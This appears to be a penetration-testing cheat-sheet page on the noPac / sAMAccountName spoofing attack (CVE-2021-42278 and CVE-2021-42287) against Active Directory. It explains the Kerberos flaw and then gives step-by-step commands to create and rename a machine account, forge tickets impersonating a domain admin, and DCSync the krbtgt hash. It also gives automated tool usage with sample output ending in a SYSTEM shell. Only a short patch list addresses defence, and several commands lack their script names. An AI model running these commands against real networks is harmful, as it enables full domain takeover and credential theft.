PenTest – NoPAC / samAccountName Spoofing

During S4U2Self, the KDC will try to append a ‘\$’ to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller’s sAMAccountName – without the ‘\$’. For instance, suppose there is a domain controller with a sAMAccountName set to ‘DC\$’. An attacker would then create a machine account with the sAMAccountName set to ‘DC’. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to ‘DC’ has been renamed, the KDC will try to find the machine account by appending a ‘$’, which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.


  • MachineAccountQuota > 0

Check for exploitation

  1. Check the MachineAccountQuota of the account
    crackmapexec ldap -u username -p 'Password123' -d 'domain.local' --kdcHost -M MAQ
    StandIn.exe --object ms-DS-MachineAccountQuota=*
  2. Check if the DC is vulnerable
    crackmapexec smb -u '' -p '' -d domain -M nopac


  1. Create a computer account
    impacket@linux> -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
    powermad@windows> . .\Powermad.ps1
    powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
    powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose
    sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword
  2. Clear the controlled machine account servicePrincipalName attribute
    impacket@linux> -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
    powershell@windows> . .\Powerview.ps1
    powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
  3. (CVE-2021-42278) Change the controlled machine account sAMAccountName to a Domain Controller’s name without the trailing $
    impacket@linux> -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
    powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
  4. Request a TGT for the controlled machine account
    impacket@linux> -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
    cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap
  5. Reset the controlled machine account sAMAccountName to its old value
    impacket@linux> -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
    powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose
  6. (CVE-2021-42287) Request a service ticket with S4U2self by presenting the TGT obtained before
    impacket@linux> KRB5CCNAME='DomainController.ccache' -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
    cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
  7. DCSync: KRB5CCNAME='DomainAdmin.ccache' -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'

Automated exploitation:

  • cube0x0/noPac – Windows
    noPac.exe scan -domain htb.local -user user -pass 'password123'
    noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
    noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
  • Ridter/noPac – Linux
    python 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip -use-ldap -dump
  • WazeHell/sam-the-admin
    $ python3 "domain/user:password" -dc-ip -shell
    [*] Selected Target dc.caltech.white                                              
    [*] Total Domain Admins 11                                                        
    [*] will try to impersonat gaylene.dreddy                                         
    [*] Current ms-DS-MachineAccountQuota = 10                                        
    [*] Adding Computer Account "SAMTHEADMIN-11$"                                     
    [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL                      
    [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL.
    [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white   
    [*] SAMTHEADMIN-11$ sAMAccountName == dc                                          
    [*] Saving ticket in dc.ccache                                                    
    [*] Resting the machine account to SAMTHEADMIN-11$                                
    [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value                     
    [*] Using TGT from cache                                                          
    [*] Impersonating gaylene.dreddy                                                  
    [*]     Requesting S4U2self                                                       
    [*] Saving ticket in gaylene.dreddy.ccache                                        
    [!] Launching semi-interactive shell - Careful what you execute                   
    nt authority\system 
  • ly4k/Pachine
    usage: [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local]
                  [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip]
    $ python3 -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!'
    $ python3 -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!'
    $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache
    $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local'

Mitigations: * KB5007247 – Windows Server 2012 R2 * KB5008601 – Windows Server 2016 * KB5008602 – Windows Server 2019 * KB5007205 – Windows Server 2022 * KB5008102 * KB5008380


Add a Comment

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *